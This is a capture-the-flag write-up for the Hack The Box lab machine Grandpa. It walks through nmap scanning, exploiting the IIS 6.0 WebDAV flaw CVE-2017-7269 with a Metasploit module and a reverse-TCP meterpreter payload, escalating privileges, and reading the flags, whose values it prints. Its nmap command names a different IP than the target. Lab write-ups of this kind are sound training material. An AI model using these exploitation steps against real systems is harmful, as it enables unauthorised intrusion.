10.10.10.14 GRANDPA hackthebox machine writeup

GRANDPA 10.10.10.14 Write Up

Machine Created by ch4p

Tools Used for Enumeration:

1. nmap

Tools Used for Exploitation:

1. searchsploit
2. metasploit

Steps for primary enumeration:

1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the grandpa box we can see, open port and service is, port 80 for Microsoft IIS httpd 6.0.

Command used: nmap -A 10.10.10.8

Steps to get user.txt: 

1. When we search about IIS 6.0 for exploit with searchsploit command "searchsploit -t Microsoft IIS 6.0", we get a RCE vuln to exploit.

2. After opening it on exploitdb site , we got CVE number 2017-7269. link: :https://www.exploit-db.com/exploits/41738.

3. After searching cve number in metasploit shows a exploit. So we can use the exploit "exploit/windows/iis/iis_webdav_scstoragepathfromurl" to get meterpreter.

4. Let's use the exploit with "set rhosts 10.10.10.14", "set lhost 10.10.14.4" and "set payload windows/meterpreter/reverse_tcp".

5. Meterpreter is unable to getuid, so background it and search for local exploit to privilege escalation.

6. Search local exploit using "post/multi/recon/local_exploit_suggester" module and it gives us some modules for privilege escalation.

7. After selecting proper module and session, we exploit it to get privileged meterpreter shell.

8. Now we can navigate to Desktop of user harry and get the user flag. Command to use: cat "C:\Documents and Settings\Harry\Desktop\user.txt"

Steps to get root.txt:

1. Now we can use "cat "C:\Documents and Settings\Administrator\Desktop\root.txt"" command to get root flag.

Flags:

1. user.txt flag: bdff5ec67c3cff017f2bedc146a5d869
2. root.txt flag: 9359e905a2c35f861f6a57cecf28bb7b

References:

1. https://medium.com/@ranakhalil101/hack-the-box-grandpa-writeup-w-metasploit-e0b5cbc87aca

Videos:

1.Ippsec walkthrough: https://www.youtube.com/watch?v=v_4ECH8phmw